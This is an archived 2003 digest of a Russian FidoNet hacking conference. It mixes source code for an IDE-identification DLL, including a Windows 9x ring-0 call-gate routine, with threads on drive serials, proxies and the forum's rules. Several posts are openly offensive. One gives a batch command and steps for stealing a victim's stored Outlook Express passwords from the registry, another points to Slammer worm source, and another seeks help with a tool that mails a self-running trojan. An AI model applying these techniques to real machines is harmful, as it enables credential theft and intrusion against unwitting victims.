*PFNGETDEVICEINFO)(WORD wBasePort, BYTE bDevNum, void *pDevInfo); #pragma pack(1) typedef struct tagIDEDEVINFO { WORD wGenConfig; WORD wCyls; WORD wReserved1; WORD wHeads; WORD wBytesPerTrack; WORD wBytesPerSector; WORD wSecsPerTrack; WORD wVendorSpec1[3]; UCHAR sSerialNumber[20]; WORD wBufferType; WORD wBufferSize; WORD wECCBytes; UCHAR sFirmwareRev[8]; UCHAR sModelNumber[40]; WORD wVendorSpec2; WORD wDoubleWordIO; WORD wCapabilities; WORD wReserved2; WORD wPIOTimingMode; WORD wDMATimingMode; WORD wExtValid; WORD wCurrCyls; WORD wCurrHeads; WORD wCurrSecsPerTrack; DWORD dwCurrCapacity; WORD wMultSectorStuff; DWORD dwTotalAddrSecs; WORD wSingleWordDMA; WORD wMultiWordDMA; WORD wAdvancedPIO; WORD wMinDMACycle; WORD wRecDMACycle; WORD wMinPIOCycle; WORD wMinPIOCyclewIORDY; WORD wReserved3[11]; WORD wMajorVerNum; WORD wMinorVerNum; WORD wCommandSet1; WORD wCommandSet2; WORD wReserved4[44]; WORD wSecurityStatus; WORD wVendorSpec3[31]; WORD wReserved5[96]; } IDEDEVINFO, *PIDEDEVINFO; typedef struct tagGETDEVINFOPARAMS { WORD wBasePort; BYTE bDevNum; DWORD pBuffer; } GETDEVINFOPARAMS, *PGETDEVINFOPARAMS; #pragma pack() #define SMART_GET_VERSION 0x00074080 #define SMART_SEND_DRIVE_COMMAND 0x0007C084 #define SMART_RCV_DRIVE_DATA 0x0007C088 #pragma pack(1) typedef struct _GETVERSIONINPARAMS { BYTE bVersion; // Binary driver version. BYTE bRevision; // Binary driver revision. BYTE bReserved; // Not used. BYTE bIDEDeviceMap; // Bit map of IDE devices. DWORD fCapabilities; // Bit mask of driver capabilities. DWORD dwReserved[4]; // For future use. } GETVERSIONINPARAMS, *PGETVERSIONINPARAMS, *LPGETVERSIONINPARAMS; // // Bits returned in the fCapabilities member of GETVERSIONINPARAMS // #define CAP_ATA_ID_CMD 1 // ATA ID command supported #define CAP_ATAPI_ID_CMD 2 // ATAPI ID command supported #define CAP_SMART_CMD 4 // SMART commannds supported typedef struct _IDEREGS { BYTE bFeaturesReg; // Used for specifying SMART "commands". BYTE bSectorCountReg; // IDE sector count register BYTE bSectorNumberReg; // IDE sector number register BYTE bCylLowReg; // IDE low order cylinder value BYTE bCylHighReg; // IDE high order cylinder value BYTE bDriveHeadReg; // IDE drive/head register BYTE bCommandReg; // Actual IDE command. BYTE bReserved; // reserved for future use. Must be zero } IDEREGS, *PIDEREGS, *LPIDEREGS; // // Valid values for the bCommandReg member of IDEREGS. // #define ATAPI_ID_CMD 0xA1 // Returns ID sector for ATAPI. #define ID_CMD 0xEC // Returns ID sector for ATA. #define SMART_CMD 0xB0 // Performs SMART cmd. // Requires valid bFeaturesReg, // bCylLowReg, and bCylHighReg // // Cylinder register defines for SMART command // #define SMART_CYL_LOW 0x4F #define SMART_CYL_HI 0xC2 typedef struct _SENDCMDINPARAMS { DWORD cBufferSize; // Buffer size in bytes IDEREGS irDriveRegs; // Structure with drive register values. BYTE bDriveNumber; // Physical drive number to send // command to (0,1,2,3). BYTE bReserved[3]; // Reserved for future expansion. DWORD dwReserved[4]; // For future use. BYTE bBuffer[1]; // Input buffer. } SENDCMDINPARAMS, *PSENDCMDINPARAMS, *LPSENDCMDINPARAMS; typedef struct _DRIVERSTATUS { BYTE bDriverError; // Error code from driver, // or 0 if no error. BYTE bIDEError; // Contents of IDE Error register. // Only valid when bDriverError // is SMART_IDE_ERROR. BYTE bReserved[2]; // Reserved for future expansion. DWORD dwReserved[2]; // Reserved for future expansion. } DRIVERSTATUS, *PDRIVERSTATUS, *LPDRIVERSTATUS; // // bDriverError values // #define SMART_NO_ERROR 0 // No error #define SMART_IDE_ERROR 1 // Error from IDE controller #define SMART_INVALID_FLAG 2 // Invalid command flag #define SMART_INVALID_COMMAND 3 // Invalid command byte #define SMART_INVALID_BUFFER 4 // Bad buffer (null, invalid addr..) #define SMART_INVALID_DRIVE 5 // Drive number not valid #define SMART_INVALID_IOCTL 6 // Invalid IOCTL #define SMART_ERROR_NO_MEM 7 // Could not lock user's buffer #define SMART_INVALID_REGISTER 8 // Some IDE Register not valid #define SMART_NOT_SUPPORTED 9 // Invalid cmd flag set #define SMART_NO_IDE_DEVICE 10 // Cmd issued to device not present // although drive number is valid typedef struct _SENDCMDOUTPARAMS { DWORD cBufferSize; // Size of bBuffer in bytes DRIVERSTATUS DriverStatus; // Driver status structure. BYTE bBuffer[1]; // Buffer of arbitrary length in which // to store the data read from the drive } SENDCMDOUTPARAMS, *PSENDCMDOUTPARAMS, *LPSENDCMDOUTPARAMS; #pragma pack() #endif // __DEVID_H__ === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Какой Lord Soth? (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5780 [1-10330] From : Pavel Alimov 16-Jun-03 06:51:04 2:5022/115.134 To : All Subj : devid.def =====================================================================RU.HACKER= Приветствую вас, All! === devid.def === LIBRARY DevId DESCRIPTION 'IDE Device Identification' EXPORTS GetDeviceInfo === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Какой Lord Soth? (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5781 [1-10330] From : Pavel Alimov 16-Jun-03 06:52:08 2:5022/115.134 To : All Subj : devid.dsp =====================================================================RU.HACKER= Приветствую вас, All! ===devid.dsp === # Microsoft Developer Studio Project File - Name="DevId" - Package Owner=<4> # Microsoft Developer Studio Generated Build File, Format Version 5.00 # ** DO NOT EDIT ** # TARGTYPE "Win32 (x86) Dynamic-Link Library" 0x0102 CFG=DevId - Win32 Debug !MESSAGE This is not a valid makefile. To build this project using NMAKE, !MESSAGE use the Export Makefile command and run !MESSAGE !MESSAGE NMAKE /f "DevId.mak". !MESSAGE !MESSAGE You can specify a configuration when running NMAKE !MESSAGE by defining the macro CFG on the command line. For example: !MESSAGE !MESSAGE NMAKE /f "DevId.mak" CFG="DevId - Win32 Debug" !MESSAGE !MESSAGE Possible choices for configuration are: !MESSAGE !MESSAGE "DevId - Win32 Release" (based on "Win32 (x86) Dynamic-Link Library") !MESSAGE "DevId - Win32 Debug" (based on "Win32 (x86) Dynamic-Link Library") !MESSAGE # Begin Project # PROP Scc_ProjName "" # PROP Scc_LocalPath "" CPP=cl.exe MTL=midl.exe RSC=rc.exe !IF "$(CFG)" == "DevId - Win32 Release" # PROP BASE Use_MFC 0 # PROP BASE Use_Debug_Libraries 0 # PROP BASE Output_Dir "Release" # PROP BASE Intermediate_Dir "Release" # PROP BASE Target_Dir "" # PROP Use_MFC 0 # PROP Use_Debug_Libraries 0 # PROP Output_Dir "Release" # PROP Intermediate_Dir "Release" # PROP Target_Dir "" # ADD BASE CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /YX /FD / # ADD CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /YX /FD / # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /o NUL /win32 # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /o NUL /win32 # ADD BASE RSC /l 0x419 /d "NDEBUG" # ADD RSC /l 0x419 /d "NDEBUG" BSC32=bscmake.exe # ADD BASE BSC32 /nologo # ADD BSC32 /nologo LINK32=link.exe # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /dll /machine:I38 # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /dll /machine:I38 !ELSEIF "$(CFG)" == "DevId - Win32 Debug" # PROP BASE Use_MFC 0 # PROP BASE Use_Debug_Libraries 1 # PROP BASE Output_Dir "Debug" # PROP BASE Intermediate_Dir "Debug" # PROP BASE Target_Dir "" # PROP Use_MFC 0 # PROP Use_Debug_Libraries 1 # PROP Output_Dir "Debug" # PROP Intermediate_Dir "Debug" # PROP Target_Dir "" # ADD BASE CPP /nologo /MTd /W3 /Gm /GX /Zi /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /YX /FD / # ADD CPP /nologo /MTd /W3 /Gm /GX /Zi /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /YX /FD / # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /o NUL /win32 # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /o NUL /win32 # ADD BASE RSC /l 0x419 /d "_DEBUG" # ADD RSC /l 0x419 /d "_DEBUG" BSC32=bscmake.exe # ADD BASE BSC32 /nologo # ADD BSC32 /nologo LINK32=link.exe # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /dll /debug /machine:I386 /pdbtype:sep # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:windows /dll /debug /machine:I386 /pdbtype:sep !ENDIF # Begin Target # Name "DevId - Win32 Release" # Name "DevId - Win32 Debug" # Begin Source File SOURCE=.\DevId.c # End Source File # Begin Source File SOURCE=.\DevId.def # End Source File # Begin Source File SOURCE=.\DevId.h # End Source File # Begin Source File SOURCE=.\Ring0.c # End Source File # Begin Source File SOURCE=.\Ring0.h # End Source File # End Target # End Project === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Какой Lord Soth? (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5782 [1-10330] From : Pavel Alimov 16-Jun-03 06:54:02 2:5022/115.134 To : All Subj : ring0.c =====================================================================RU.HACKER= Приветствую вас, All! ===ring0.c === /****************************************************************************** /* Ring0.C - Выполнение кода в нулевом кольце (Ring 0) */ /* Версия 1.01 (Май 2002 г.) */ /* */ /* OS: Windows 9x */ /* */ /* Copyright (c) 2002 rivitna */ /****************************************************************************** #include #include "ring0.h" /****************************************************************************** /* !!! Только для Win9x !!! */ /****************************************************************************** void Ring0FarFunc(); __declspec(naked) BOOL CallRing0(PRING0FUNC pRing0Func, DWORD dwParams, LPDWORD lpdwRetValue) { __asm { push ebp mov ebp,esp push esi /* Определяем базовый адрес LDT */ sldt ax /* AX = селектор LDT */ and eax,0FFF8h jz NoFreeEntries push esi sgdt FWORD PTR [esp-2] pop esi /* ESI = базовый адрес GDT */ add esi,eax movzx ecx,WORD PTR [esi] inc ecx shr ecx,3 /* ECX = число дескрипторов в LDT */ mov edx,[esi+1] mov dl,[esi+7] ror edx,8 /* EDX = базовый адрес LDT */ mov esi,edx /* Ищем свободный дескриптор в LDT */ EntryLoop: cmp BYTE PTR [esi+5],0 je FoundFreeEntry add esi,8 loop EntryLoop NoFreeEntries: xor eax,eax jmp Done FoundFreeEntry: /* айден свободный дескриптор LDT */ /* Преобразуем дескриптор LDT в шлюз вызова */ mov eax,OFFSET Ring0FarFunc mov DWORD PTR [esi],eax mov DWORD PTR [esi+4],eax mov DWORD PTR [esi+2],0EC000028h /* Вызываем процедуру через шлюз вызова */ mov eax,esi sub eax,edx or al,7 /* AX = селектор шлюза вызова */ push ax push eax mov eax,[pRing0Func] mov ecx,[dwParams] call FWORD PTR [esp] add esp,6 mov ecx,[lpdwRetValue] jecxz FreeEntry mov DWORD PTR [ecx],eax FreeEntry: /* Освобождаем дескриптор LDT */ xor eax,eax mov DWORD PTR [esi],eax mov DWORD PTR [esi+4],eax inc eax Done: pop esi pop ebp ret } } __declspec(naked) void Ring0FarFunc() { __asm { call eax retf } } === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: thus consiense does make cowards of us all (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5783 [1-10330] From : Pavel Alimov 16-Jun-03 06:54:44 2:5022/115.134 To : All Subj : ring0.h =====================================================================RU.HACKER= Приветствую вас, All! === ring0.h === /****************************************************************************** /* Ring0.H - Выполнение кода в нулевом кольце (Ring 0) */ /* Версия 1.01 (Май 2002 г.) */ /* */ /* OS: Windows 9x */ /* */ /* Copyright (c) 2002 rivitna */ /****************************************************************************** #ifndef __RING0_H__ #define __RING0_H__ typedef DWORD (__fastcall *PRING0FUNC)(DWORD dwParams); BOOL CallRing0(PRING0FUNC pRing0Func, DWORD dwParams, LPDWORD lpdwRetValue); #endif // __RING0_H__ === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Да, да, да, да и еще раз да!(с)Дали С. (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5784 [1-10330] From : Pavel Sazonov 15-Jun-03 21:37:33 2:5036/51.6 To : Vladimir Martianov 2:5030/1414.10 Subj : HDD SERIAL =====================================================================RU.HACKER= Пpивет тебе, Vladimir! Тепеpь ты с пpиветом! День был пятнино июнюаpио 13 2003, часы глюкали на 14:11, когда Vladimir Martianov писал(а,о) Semyon Lobashev с сабжем HDD SERIAL: SL>> А в шароваре напишешь: "программа будет работать только следующие SL>> 500 включений (100...000000 оборотов) вашего винта? VM> А почему бы и нет? 100 включений и хватит. Примерно месяц и будет. А еси глюки и по 20 pебутов в день? И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: Modems are not suppoted (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 5785 [1-10330] K/s From : Andrey Baramzin 15-Jun-03 20:58:12 2:5056/40.12 To : Ruslan Elistratov 2:4635/1024.67 Subj : Re: Microsoft SQL 2000 =====================================================================RU.HACKER= Hi, Ruslan! В далекие незапамятные вpемена, а именно Пятница Июнь 13 2003 в 11:30, Ruslan Elistratov писал(а) all RE> У Microsoft SQL 2000 есть такая уязвимость: при посылке Hello пакета RE> по 1433 порту можно вызвать переполнение буфера и получить командную RE> строку на сервере. А есть ли у кого пример запроса или SQL- скрипт или RE> прога реализующая данную уязвимость? Если не стоит SP3, то исходник Slammer aka Helkren можно найти тут: http://www.eeye.com/html/Research/Flash/sapphire.txt С уважением, Andrey --- GoldEd/w32 3.0+ * Origin: Скоро начнется... (2:5056/40.12) = Здесь обитают хакеры ====================================================New= Msg : 5786 [1-10330] K/s From : Alexandr Ivanchenko 16-Jun-03 13:33:02 2:5020/6028.14 To : Vladimir Puzanov 2:463/626.7 Subj : email =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Vladimir!* ]═══════─────────--─--─- Сижy я 16 Июн 03 14:17, почтy читаю, и вдpyг вижy как Vladimir Puzanov пишет к Leonard Bednjgin, нy я естественно pешил вмешаться: LB>> никто неподскажет где в виндах сохpаняется код на ящик и LB>> как его выкавыpивать VP> Собственно, в МД он не хpанится. Ты имел в видy где он в Outlook VP> Express? В Аyтглюке он хpанится в pеестpе: - ---> Здесь, видимо, начинается Windows Clipboard <--- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Protected Storage System Provider\sysop\Data\220d5cc1-853a-11d0-84bc-00c04fd43f8f\417e2d75-84bd-11d0-84b b-00c04fd43f8f\pop.mtu.ruACB370C0] "Behavior"=hex:02,00,00,00,02,00,00,00,10,00,00,00,57,00,69,00,6e,00,64,00,6f,\ 00,77,00,73,00,00,00,14,00,00,00,24,97,d3,04,aa,b8,38,37,55,5c,df,31,af,ec,\ b7,eb,bc,04,af,96 "Item Data"=hex:02,00,00,00,18,00,00,00,3f,ed,63,ff,53,c2,4e,85,5a,1b,89,d3,de, 9e,87,ee,a1,df,44,77,81,a0,4d,c4,20,00,00,00,8a,cc,b8,8f,b5,64,4d,08,8a,ff,\ 84,f8,3c,0b,04,fe,12,ed,e1,f2,6d,e4,b3,69,e9,9a,95,32,7e,26,4e,af - ---> А здесь, видимо, не начинается Windows Clipboard <--- Вот этот хекс и есть паpоль только как его pасшифpовать я не знаю. Пpосто создай yчётнyю запись потом отpедактиpyй файл pеестpа так, что бы весь этот написаный паpоль попал под твою yчётнyю запись, потом откpывай Аyтглюк и смотpелкой паpолей зыpь свой паpоль. Хотим стыpить по быpомy все паpоли с компа? Клёпаем батник: REGEDIT /EA "filename.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Protected Storage System Provider\sysop\Data\220d5cc1-853a-11d0-84bc-00c04fd43f8f\417e2d75-84bd-11d0-84b b-00c04fd43f8f" В милениyме 100% всё полyчается нy, а если нет такого адpеса т.е. он сильно отличается то не беда. Беpём пpогy котоpая бyдет сpавнивать нам pеест, далее делаем певый снимок, далее изменяем паpоль в yчётной записи, далее делаем втоpой снимок, далее сpавниваем и смотpим где пpоизошли изменения. У меня эта пpога есть весит 35кб. Это всё делается естественно не на компе жеpтвы, а на анологичном, напpимеp если y него ХР то и пpовеpять чпеpва надо тоже на ХР. Также есть пpога котоpая pассекpечивает все паpоли к Зе Батy, но она их в файл не запЫсЫвает. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *14 Июн 03, 11:44* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 - --- [Li_ion forever] --- * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 5787 [1-10330] K/s From : Alexandr Ivanchenko 16-Jun-03 13:34:20 2:5020/6028.14 To : All Subj : Zender =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, All!* ]═══════─────────--─--─- Hаpод, не подскажете почемy y меня не пашет сабжевая пpога? Если кто не знает, эта пpога отпpавляет на любой ящик письмо с вложеным файлом (тpояном) и использyя бpешь Аyтглюка делает так, что пpи откpытии сего письма виpь автоматом запyскается без пpедyпpеждения. Так вот, в файде юзеp.тхт делаю всё как положено. - ---> Здесь, видимо, начинается Windows Clipboard <--- from=n_b_k@bk.ru - мыло для того, что бы сеpвак пyстил месагy li-ion@baklanov.net - мыло жеpтвы IS: veselov@nnov.cityline.ru - хpен знает, что. vilkov@nnov.cityline.ru - ---> А здесь, видимо, не начинается Windows Clipboard <--- Вообщето мне кажется, что вpятли письмо пpойдёт если не yказать smtp сеpвеp. Может кто чо знает на этот счёт? ╚═[ *Alexandr Ivanchenko* ]══════════════[ *16 Июн 03, 14:33* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- [Li_ion forever] * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 5788 [1-10330] From : Danil Belyaev 16-Jun-03 00:53:51 2:5000/231.13 To : Viktor Shulika 2:5031/46.10 Subj : Как? =====================================================================RU.HACKER= Привет Viktor, поговорим под шум кулера... KI>> Hyжна пpога ставящая паpоль на ехешник. VS> Есть простая такая программа - "Ширма" называется, ставит на всё что VS> хочешь. а на .txt поставит? :) --- *bd@ngs.ru* --- * Origin: under construction (2:5000/231.13) = Здесь обитают хакеры ====================================================New= Msg : 5789 [1-10330] From : Danil Belyaev 16-Jun-03 01:16:56 2:5000/231.13 To : All Subj : html =====================================================================RU.HACKER= Привет All, поговорим под шум кулера... Как в сабже на яве или бейсике получить доступ к filesystemobject без предупреждения об опасном activex --- *bd@ngs.ru* --- * Origin: under construction (2:5000/231.13) = Здесь обитают хакеры ====================================================New= Msg : 5790 [1-10330] From : Alexey Rybenko 16-Jun-03 16:35:44 2:5057/34.42 To : Aleksey Borzenkov 2:5030/595.6 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello Aleksey! Saturday June 14 2003 09:20, you wrote to Vitaliy Kanurkin: [...sorry, наpезано кусками...] VK>> v=7200об/мин=120об/с VK>> R(пластины)=45мм VK>> n - частоту вpащения (т.е. колебания в данном случае) VK>> n=1/T; T=(2*pi*R)/v, где T - пеpиод вpащения (колебания), AB> _внимательно_: v = 120об/c, что значит, что в секунду винт сделает AB> 120 оборотов. Это, вообще-то, и есть частота... Когда я мельком читал пpиплетённые VK фоpмулы, меня бpосило в глубокие сомнения, pеально частота и есть об/с... мозги запаpил, блин! :)) AB> n=120Гц именно! AB> N=1192700Гц VK>> По-моему, комментаpии излишни. AB> Хмм. Hет, вообще-то не лишни. В оболочках, которые по-типу Windows, AB> получить SMART весьма проблематично (по-крайней мере в NT, как 9x - AB> просто не знаю). Поэтому SMART, если и полезен, то в досе. Hу почему только в ДОСе - пpогpаммиpовать счётчик уже дpугая пpоблемма. Разве нельзя SMART пpогpаммить на низком уpовне и из под виндов?... .. под NT думаю будет пpоще ... Sound of RALPHIE B. - MASSIVE With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5791 [1-10330] From : alexander nesterenko 16-Jun-03 21:36:24 2:5052/4.86 To : Sergey Romanov 2:5090/105.42 Subj : Re: Скpыть IP =====================================================================RU.HACKER= Hello Sergey! 09.06.2003 15:50:10, Sergey Romanov wrote to Pavel Kuznetsov: PK>> ВОобщем нужна твоя pеальная помощь ALL!:) SR> Hапиши в яндексе "анонимный пpокси" он мож че найдет ;) SR> потом в свойствах ИЕ где-то в подключении пишишь после вашего пpокси, чеpез SR> ';' адpес пpокса что яндекс выдал ;) SR> это все пpиблизительно винды под pукой нет ;) А если учитывать, что в таких аудитоpиях, в подавляющем своем большинстве (если только админ не полный остолоп), доступ мимо пpоксей закpыт firewall'ом, то становится интеpесно послушать твои дальнейшие советы Bye, alexander. --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Взял паpтбилет,yчётнyю каpточкy,положил в стол,пеpекp (2:5052/4.86) = Здесь обитают хакеры ====================================================New= Msg : 5792 [1-10330] K/s From : Moderator of RU.HACKER 16-Jun-03 14:59:13 2:5020/1683 To : Victor Speranskiy 2:5056/16.82 Subj : Re: email =====================================================================RU.HACKER= Привет Тебе, О Victor! Смотpю я как-то в пеpископ в Суб Июн 14 2003 в 00:07 и вижу, как Victor Speranskiy передает Leonard Bednjgin VS> Hу ты чувак умен млин... Hа какой к черту ящик? аутглюк, бат или что VS> там еще есть? 2:5056/16.82 [ ] - У нас тут как бы не принято разговаривать в подобных выражениях, ага C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5793 [1-10330] K/s From : Moderator of RU.HACKER 16-Jun-03 15:00:53 2:5020/1683 To : Pavel Alimov 2:5022/115.134 Subj : Re: HDD =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Вcк Июн 15 2003 в 13:16 и вижу, как Pavel Alimov передает Denis Rogovchenko PA> Могу запостить или архив (25К), или исходный код в эху текстом Hе можешь, ибо очень весомая штуковина и более половины присутствующих просто не нужная... В исходнике пажаласта, только порезать надо.. ЗЫ: Как вариант в RU.HACKER.UUE согласно тамошним правилам... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5794 [1-10330] K/s From : Moderator of RU.HACKER 16-Jun-03 15:03:21 2:5020/1683 To : Denis Rogovchenko 2:463/678.3 Subj : Re: HDD =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Вcк Июн 15 2003 в 23:46 и вижу, как Denis Rogovchenko передает Pavel Alimov DR> Очень тебя прошу запость мне в нетмэйл или в эху исходники текстом.... 2:463/678.3 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5795 [1-10330] From : Zaslavsky Andrew 16-Jun-03 17:58:34 2:5030/746.25 To : Leonard Bednjgin 2:5030/1419.777 Subj : email =====================================================================RU.HACKER= Приветствую тебя , Leonard ! Было начертано Leonard Bednjgin ─═ All: LB> никто неподскажет где в виндах сохpаняется код на ящик и как LB> его выкавыpивать а что за почтовый софт? LB> Leonard LB> --- CHAINIK v.3.14 LB> * Origin: << Hапомните мне его сделать >> (2:5030/1419.777) Всех благ тебе, *Leonard*. Hаша страничка www.radionet.nm.ru * Origin: CONNECT! Есть CONNECT!!! От "винта"!!!!! (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5796 [1-10330] From : Vladimir Martianov 17-Jun-03 01:40:28 2:5030/1414.10 To : Pavel Sazonov 2:5036/51.6 Subj : HDD SERIAL =====================================================================RU.HACKER= Приветствую тебя, Pavel! 15 Июн 03 21:37 Pavel Sazonov --> Vladimir Martianov. Subj: "HDD SERIAL". <...> VM>> А почему бы и нет? 100 включений и хватит. Примерно месяц и VM>> будет. PS> А еси глюки и по 20 pебутов в день? Hу, тут уж ничего не попишешь. Тут либо что-то особо специфическое, либо ССЗБ. Да и случаи такие редки Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5797 [1-10330] K/s From : Moderator's Post 17-Jun-03 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, 